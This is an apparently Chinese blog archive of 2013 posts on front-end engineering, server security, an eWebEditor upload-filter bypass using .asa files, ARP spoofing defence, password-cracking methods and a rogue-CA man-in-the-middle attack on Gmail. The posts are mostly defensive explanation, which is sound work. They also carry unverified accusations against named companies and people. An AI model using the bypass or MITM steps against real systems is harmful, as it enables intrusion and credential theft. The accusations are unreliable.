相对于产品工程师,这个职位显得很加缺乏,因为产品工程师很多时候可以由项目经理或者部门主管兼任,但Web前端工程师这个职位,是很多公司都不重视的职位,很多公司是这样的,Html和CSS由美工负责,而Javascript由程序员负责。但问题是,很多美工对Html/CSS只能实现,至于规范也速度很少考虑,而程序员对Javascript就更加了,从我接触过的程序员中,绝大多数人觉得Javascript是一个比较简单的语言,没什么前途,看不起这种语言,也认为Javascript只能实现一些交互而已。
所以实际上,很多企业是用两个懂一点点的人,来做这个重要的工作。如果让我来选择,我愿意放弃一个,甚至两个程序员,来换一个Web前端工程师。为什么要这么做?我认为,一个网站两个非常重要的地方,就是他的交互性与速度。很多程序员喜欢划分前台与后台,他们都认为前台不重要,只要后台功能完成了,前台不是很简单的事么!不!不是这样的,前台比后台重要,为什么这么说?你想想,一个用户是通过什么接触到你的网站的,是前台,是Web页面,而不是后台冷冰冰的程序。你有再强大的功能,如果用户操作起来很复杂,那么用户也会抛弃你的,除非用户别无选择,比如说工信部的备案,但问题是,现在互联网同质化越来越厉害,抄袭也变得风行,你真的有这么高的技术壁垒让其它公司没有办法做到和你一样的产品么?
注意,不要钻牛角尖,我并非说后台完全不重要,你要非说就算你前台再好,我后台一个死循环出不来,那不是也没戏,这是抬杠!除了大型网站和逻辑错误,现在多数网站并不存在后台影响速度的问题,或者说影响不是那么明显。前台所带来的问题,要比后台带的问题多得多,也容易解决得多,往往是可以花少量的代价来解决大问题的,可是往往很多企业愿意去花钱买带宽买服务器租CDN以提高速度,却不愿意请一个Web前端工程师来解决这个问题。同时,请注意,就算你服务器再快你的带宽再高,用户的带宽是不变的,如果你超出了用户带宽的阀值,你所做的一切将都是豪无意义的。
程序员往往可以实现Javascript的功能,但是由于Javascript的特殊性,他们很难以最优化的方式来开发Javascript代码,就可能就造成他们去网上Copy一段Javascript,然后只要实现效果即可,大量重复的甚至是有Bug的代码被应用到网站中,这些代码将会影响到用户的执行效率,降低用户体验。在HTML方面,这也是程序员的弱项,他们也觉得这个东西太简单,实现起来很容易,但是HTML和Javascript都是入门易深入难的东西,如何合理地组织Html+CSS,让浏览器更快更有效率地执行,这个也是需要很多年的经验的。
在用户体验方面,大公司可能用UE/UI等部门,而小公司的话,一定要有Web前端工程师,美工只是设计页面,很难照顾到用户体验这个层面,当然不排除有些美工已经有这样的水平。实际上用户体验也和产品设计一样,都属于开源的一部分,因为如果用户体验好就能带来更多的用户,不是开源是什么。
最后,我想分析一下造成这两个职位被忽视的原因,产品工程师一职,往往被项目经理或者部门主管+投资人代替了,一般来说,做到主管级的人对行业多多少少算比较了解,所以这个职位的缺失可能不会带来大问题,但也有时候会因为这个职位的缺失而导致项目失败的安例发生,这就要求主管同时也要有产品工程师的能力。
Web产端工程师是最容易被忽略也是最不好招聘的职位,究其原因,是因为部门主管往往是做技术出身的,而技术人员常常会轻视或者忽视前台的工作,也正是这个原因,造成了Web前端工程的工作比较低,所以很多人不愿意去做这个职位,我就常常看到新人如果让ta学习Html/CSS /Javascript,ta就会问你,什么时候我才可以真正编程啊,这样就形成了一个恶性循环,企业不重视,工资上不去,程序员也就不愿意学习了。然后,这个职位可以给公司省下非常高的费用,可以节省数个程序员,减少带宽及服务器。不信?试试看吧!
来源:涂雅投稿,原文网址,转载请保留此链接,否则视为侵权。
2013年2月18日星期一
黑客啊黑客
虽然前一阵服务器被人攻击,但是我也得到了很多经验教训。配置服务器为hisecweb模板后,可以抵抗一般规模的DDOS攻击了。服务器CPU通常只有5%的使用率。但是被攻击时候会增高到30%上下。
对于所谓的黑客,我目前对其很厌恶。我的服务器安全性可以说是很不错了,几乎所有的漏洞和缺陷都打了补丁,目前最大的入侵威胁是程序代码上的一些不规范(特别是第三方的程序代码)可能导致的漏洞,因此安全的措施是尽量少地使用一些公用的公开源代码的程序,不得不使用的话,应该将管理模块和页面模块分离。
当然,即使配置了安全的服务器,也还是有人通过DDOS来攻击人,这就令人很气愤。软件防火墙只能防止小规模的DDOS,但是对于大规模的分布式DDOS,只能花钱去购买硬件防火墙才能处理的了。因此,那些做硬件防火墙和路由器的应该最希望别人被分布式DDOS了。
中国目前的法律还不是很严格,特别是执法队伍的电脑网络水平极低,绝大多数甚至根本不懂电脑,对于最简单的黑客技术都没有有效的分析诊断和惩处手段,更不要说DDOS这种攻击手段的网络犯罪了,因此中国也就成为黑客的“天堂”。我的一个亲身经历是,某个“安全公司”为了让我司购买其天价防火墙产品未果后,故意将我司主页黑掉,并换成色情图片,我司向本地公安局报案后,公安局根本就不受理这种案件,让我们去找和他们合作的公司进行分析,也就正是那家“安全公司”。如果我国也象美国那样,以严厉的手段打击一批著名的黑客,那么黑客攻击也不至于象目前这样嚣张了,至少那些只懂一些三角猫功夫的“黑客”就不敢随便使用别人的攻击软件去乱搞了。
eWebEditor编辑器的安全漏洞
今天帮一个朋友清除了Z-Blog里的一个系统漏洞。
早上,ilmay发邮件给我,说他博客进不去,要我帮忙,我去看了下,发现页面文件里被加入了iframe恶意木马病毒,应该是被黑了,可能是利用了系统里的某个漏洞。因为他用的是Z-Blog Plus,和我用的自己修改的Z-Blog有点类似,因此我对这个漏洞也比较感兴趣。
经过对IIS日志文件的分析,我发现原因是eWebEditor编辑器有重大漏洞。Z-Blog Plus提供了eWebEditor编辑器,却没有说明如何正确使用,并且不做任何修改而直接使用的话,简直就是一场灾难。
首先的一个漏洞是eWebEditor提供了后台登录,默认用户名和密码可以登录进去。
其次,eWebEditor目录下的Upload.asp文件,有一个极为幼稚的错误,即对于文件过滤只是通过sAllowExt=Replace(UCase(sAllowExt), "ASP", "")来禁止上传asp文件,那么为什么不同时过滤asa、cer等文件呢?而且怎么可以用这种有问题的语句进行过滤呢?事实上,黑客正是利用这个漏洞上传了一个后缀为asa的木马文件。
解决这个问题的方法是,先用admin登录到后台,修改密码,然后删除admin_login.asp文件,如果不需要上传的话,最好连upload.asp也一起删除掉。另外我看了看eWebEditor的代码,感觉写的比较乱,可能还会有其他漏洞,不建议使用这个编辑器。
对于Z-Blog的安全,我觉得,应该尽量少地增加一些编辑器或其他插件,关闭用户注册功能,关闭附加编辑器的上传功能,不要使用一些有安全漏洞的编辑器,这样才可以保证系统的安全性。
另外要少在页面里添加外部的script代码,特别是统计代码。我就曾经为了统计浏览数而增加了一个名叫武林榜(50bang)的统计代码,曾经发现偶尔会出现病毒,也有用户举报,以前总以为是不是武林榜服务器被黑客攻击,后来才知道原来武林榜和周鸿袆、庞升东等搞过9991这样声名狼藉的木马病毒的人有着密切的关系,因此我以最快的速度将武林榜的代码从我所有网页里删除,防止其再去害人。
在当今之中国,网民是命中注定要被那些做网站的老流氓们强奸,即使高手也会防不胜防。
服务器的ARP欺骗攻击的防范
这些天我的服务器几乎天天都被人ARP欺骗攻击,网页被挂木马,实在烦死了,深圳的龙岗电信机房实在是够恶心的,不得已,我只好寻找一些防范ARP攻击的方法,目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击。
静态地址法指的是,在本地服务器上,将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击,如果你也越到了类似的ARP欺骗攻击,也可以参考这个方法进行设置。
首先,找到路由器真实的MAC地址,在没有被攻击的条件下,输入命令arp -a 网关的IP地址,就可以找到,其中Physical Address里就是网关MAC地址,显示类似00-07-e9-0a-77-93,其类型Type通常为动态dynamic。我们的目的是要将其设置为静态static。
接着, 使用arp -d命令删除目前的arp列表,再使用arp -s 网关IP地址 网关MAC地址,将其设置为静态static。
这时候,系统的ARP就会变成静态了,但是如果服务器重新启动,这些设置就消失了,因此,编辑一个BAT文件,内容为以上的arp -s的内容,将其加到“启动”菜单中,然后修改Windows注册表使得Windows可以自动登录,这样每次启动都会自动设置静态的ARP了。
如果感觉操作起来麻烦,或者使用上面的方法依旧无法阻止ARP攻击,那么可以使用第二种方法,使用专门的ARP防火墙软件来阻止别人的ARP攻击。目前主要的ARP防火墙产品有免费的奇虎360antiarp,其他大多都是收费的ARP防火墙,根据我的使用感受,有一个叫antiarp的商用软件功能还是比较丰富的,软件价格是每台服务器199元。在服务器上安装这个软件之后,除了可以自动预防ARP攻击之外,还可以使用这个ARP防火墙软件查找出ARP攻击者的IP地址。知道了攻击者的IP地址后,大家就可以将其截图后发给IDC机房,要求机房关闭那台ARP服务器,通常情况下机房会关闭病毒服务器,如果机房不关闭服务器,那就去公安局报案,指控电信机房散布病毒。
对于那些托管服务器却不做好安全设定的人,我劝他们先学好计算机知识后再托管服务器,否则以后肯定会吃大亏。对于那些主动在服务器上使用arp病毒工具的人,我鄙视他们,祝他们好自为之。
附录:ARP相关背景知识(来自欣向ARP工具)
ARP欺骗原理:
在局域网中,通信前必须通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)。ARP协议对网络安全具有重要的意义,但是当初ARP方式的设计没有考虑到过多的安全问题,给ARP留下很多的隐患,ARP欺骗就是其中一个例子。而ARP欺骗攻击就是利用该协议漏洞,通过伪造MAC地址实现ARP欺骗的攻击技术。
在同一局域网内的电脑都是通过MAC地址进行通讯的。方法为,PC和另一台设备通讯,PC会先寻找对方的IP地址,然后在通过ARP表(ARP表里面有所以可以通讯IP和IP所对应的MAC地址)调出相应的MAC地址。通过MAC地址与对方通讯。也就是说在内网中各设备互相寻找和用来通讯的地址是MAC地址,而不是IP地址。
网内的任何一台机器都可以轻松的发送ARP广播,来宣称自己的IP和自己的MAC.这样收到的机器都会在自己的ARP表格中建立一个他的ARP项,记录他的IP和MAC地址。如果这个广播是错误的其他机器也会接受。有了这个方法欺骗者只需要做一个软件,就可以在局域网内进行ARP欺骗攻击了。
ARP的发现:
ARP的通病就是掉线,在掉线的基础上可以通过以下几种方式判别,1.一般情况下不需要处理1分钟之内就可以回复正常上网。因为ARP欺骗是由时限,过了期限就会自动的回复正常。而且现在大多数路由器都会在很短时间内不停广播自己的正确ARP,使受骗的机器回复正常。但是如果出现攻击性ARP欺骗(其实就是时间很短的量很大的欺骗ARP,1秒有个几百上千的),他是不断的通过非常大量ARP欺骗来阻止内网机器上网,即使路由器不断广播正确的包也会被他大量的错误信息给淹没。2.打开被骗机器的DOS界面,输入ARP -A命令会看到相关的ARP表,通过看到的网关的MAC地址可以去判别是否出现ARP欺骗,但是由于时限性,这个工作必须在机器回复正常之前完成。如果出现欺骗问题,ARP表里面会出现错误的网关MAC地址,和真实的网关MAC一对黑白立分。
十个常用破解网络密码的方法
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网络普及进程的一个重要环节,因此,在网民采取安全措施保护自己的网络密码之前,有必要了解一下流行的网络密码的破解方法,方能对症下药,以下是我总结的十个主要的网络密码破解方法。
1、暴力穷举
密码破解技术中最基本的就是暴力破解,也叫密码穷举。如果黑客事先知道了账户号码,如邮件帐号、QQ用户帐号、网上银行账号等,而用户的密码又设置的十分简单,比如用简单的数字组合,黑客使用暴力破解工具很快就可以破解出密码来。因此用户要尽量将密码设置的复杂一些。
2、击键记录
如果用户密码较为复杂,那么就难以使用暴力穷举的方式破解,这时黑客往往通过给用户安装木马病毒,设计“击键记录”程序,记录和监听用户的击键操作,然后通过各种方式将记录下来的用户击键内容传送给黑客,这样,黑客通过分析用户击键信息即可破解出用户的密码。
3、屏幕记录
为了防止击键记录工具,产生了使用鼠标和图片录入密码的方式,这时黑客可以通过木马程序将用户屏幕截屏下来然后记录鼠标点击的位置,通过记录鼠标位置对比截屏的图片,从而破解这类方法的用户密码。
4、网络钓鱼
“网络钓鱼”攻击利用欺骗性的电子邮件和伪造的网站登陆站点来进行诈骗活动,受骗者往往会泄露自己的敏感信息(如用户名、口令、帐号、PIN码或信用卡详细信息),网络钓鱼主要通过发送电子邮件引诱用户登录假冒的网上银行、网上证券网站,骗取用户帐号密码实施盗窃。
5、Sniffer(嗅探器)
在局域网上,黑客要想迅速获得大量的账号(包括用户名和密码),最为有效的手段是使用Sniffer程序。Sniffer,中文翻译为嗅探器,是一种威胁性极大的被动攻击工具。使用这种工具,可以监视网络的状态、数据流动情况以及网络上传输的信息。当信息以明文的形式在网络上传输时,便可以使用网络监听的方式窃取网上的传送的数据包。将网络接口设置在监听模式,便可以将网上传输的源源不断的信息截获。任何直接通过HTTP、FTP、POP、SMTP、TELNET协议传输的数据包都会被Sniffer程序监听。
6、Password Reminder
对于本地一些保存的以星号方式密码,可以使用类似Password Reminder这样的工具破解,把Password Reminder中的放大镜拖放到星号上,便可以破解这个密码了。
7、远程控制
使用远程控制木马监视用户本地电脑的所有操作,用户的任何键盘和鼠标操作都会被远程的黑客所截取。
8、不良习惯
有一些公司的员工虽然设置了很长的密码,但是却将密码写在纸上,还有人使用自己的名字或者自己生日做密码,还有些人使用常用的单词做密码,这些不良的习惯将导致密码极易被破解。
9、分析推理
如果用户使用了多个系统,黑客可以通过先破解较为简单的系统的用户密码,然后用已经破解的密码推算出其他系统的用户密码,比如很多用户对于所有系统都使用相同的密码。
10、密码心理学
很多著名的黑客破解密码并非用的什么尖端的技术,而只是用到了密码心理学,从用户的心理入手,从细微入手分析用户的信息,分析用户的心理,从而更快的破解出密码。其实,获得信息还有很多途径的,密码心理学如果掌握的好,可以非常快速破解获得用户信息。
好了,以上就是我总结了一些网络密码破解的常用方法,如果你也有其他不同的破解方法,请留言告诉我。
2013年2月17日星期日
破解Google Gmail的https新思路
最近,Google针对Gmail被攻击事件,全面默认启用了始终以https访问Gmail的方式了。但是,对于可以动用整个国家力量的黑客来说,从网络通讯数据中(在此不讨论对用户电脑种木马破解https的情况,只讨论在网络通讯数据中破解https的方法)破解https除了暴力破解(暴力破解https即使按照现在的集群计算能力仍旧需要几百至几万年不等)之外真的别无他法了吗?事实并非如此。
我们知道,https的安全性主要是由SSL证书中的公钥和私钥来保证的。浏览器与服务器经过https建立通讯的时候(不考虑SSL代理方式需要用户提交证书的情况,因为我们现在讨论的是浏览器访问网站,和SSL代理无关)会按照以下步骤保证通讯的安全性:
1、浏览器连接服务器,服务器把SSL证书的公钥发送给浏览器
2、浏览器验证此证书中的域是否和访问的域一致(比如用户访问https://mail.google.com/时,浏览器验证服务器发送过来的SSL证书的公钥中的域是否为mail.google.com或*.google.com)并没有过期
3、如果浏览器验证失败,浏览器通知用户证书有问题,让用户选择是否继续
4、如果浏览器验证成功,那么浏览器随机生成一个对称密钥并使用接收到的SSL证书的公钥进行加密并发送给服务器
5、服务器通过SSL证书的私钥对收到的信息进行解密并得到浏览器随机生成的对称密钥
6、最后服务器和浏览器都通过这个对称密钥进行通讯了(为什么不直接使用公钥和私钥进行通讯?因为非对称加密比对称加密效率低)
这个方案看似完美,却无法抵御中间人攻击,攻击者可以按以下步骤实施攻击截取https通讯中的所有数据:
1、攻击者伪造一个Gmail的SSL证书,使其中的域为mail.google.com或*.google.com,并设置合适的证书过期时间
2、攻击者等待访问者的浏览器访问Gmail时,通过DNS劫持或IP伪造(对于有路由器控制权限的黑客来说简直轻而易举)的方法使其访问到攻击者的服务器上
3、攻击者把伪造的SSL证书公钥发送给浏览器
4、浏览器验证SSL证书的域和过期时间都没错,认为访问到的就是Gmail本身,从而把对称密钥发送给黑客服务器
5、黑客服务器把伪造的Gmail网页通过收到的对称密钥加密后发送给浏览器
6、访问者通过浏览器输入Gmail帐户,发送给黑客服务器,黑客服务器通过收到的对称密钥解密后成功获得访问者的Gmail密码
为了抵御这种中间人攻击,SSL证书需要由可信的SSL证书颁发机构颁发,形成一个证书链(比如Gmail的证书链为:最底层为网域mail.google.com,上一层为Thawte SGC CA证书颁发机构,最顶层为很有名的VeriSign证书颁发机构)。那么,浏览器除了需要验证域和有效期外,还要检查证书链中的上级证书公钥是否有效,上级的上级证书公钥是否有效,直至根证书公钥为止。这样就可以有效避免中间人攻击了,因为根证书公钥都是预装在操作系统中的,黑客如果不是暴力破解,无法得到根证书的私钥,如果黑客自己生成一个私钥,浏览器验证根证书公钥的时候发现无法通过操作系统中预装的公钥加密数据后使用这个私钥进行解密,从而判定这个公钥是无效的。这个方案也是现在https通讯通常的方案。
那么,这个现在所有的浏览器正在使用的https通讯方案就无懈可击了吗?答案仍是否定的。我们可以看到,在后一个方案中,https的安全性需要在证书颁发机构公信力的强有力保障前提下才能发挥作用。如果证书颁发机构在没有验证黑客为mail.google.com的持游者的情况下,给黑客颁发了网域为mail.google.com的证书,那么黑客的中间人攻击又可以顺利实施:
1、攻击者从一家不验证mail.google.com持有者的SSL证书颁发机构WoSign那里得到了网域为mail.google.com的证书,此证书的证书链为:最底层为网域mail.google.com,上一层证书颁发机构为WoSign,顶层证书颁发机构为VeriSign
2/3、第二、第三个步骤同上一个方案的中间人攻击的第二、第三个步骤
4、浏览器验证SSL证书的域和过期时间都没错,继续验证证书链:
4.1、最底层的网域mail.google.com证书公钥不在操作系统中,无法验证其访问到的就是Gmail本身,继续验证上一层证书颁发机构
4.2、上一层证书颁发机构WoSign的公钥也不在操作系统中,仍旧无法验证其有效性,继续验证上一层证书颁发机构
4.3、浏览器看到顶层证书颁发机构VeriSign的公钥在操作系统中,认为证书链有效,从而把对称密钥发送给黑客服务器
5/6、第五、第六个步骤同上一个方案的中间人攻击的第五、第六个步骤。黑客成功获得访问者的Gmail密码
然而,不验证域名持有者就颁发证书的情况在国外几乎不会发生,但是在国内就不一定了。针对破解目标,国内证书颁发机构WoSign(在此只是举例国内比较有名的证书颁发机构WoSign,并不代表WoSign今后一定会这么做)很有可能为了上级要求颁发了证书给非域名持有者的黑客,从而使得破解目标的Gmail密码被黑客截取。
那么,国内的破解目标是不是使用https的Gmail也无法保证安全了呢?欢迎与我进行探讨。
来源:读者lehui99投稿,投稿人Email为:lehui99@gmail.com,Google Wave为:lehui99@googlewave.com。
订阅:
博文 (Atom)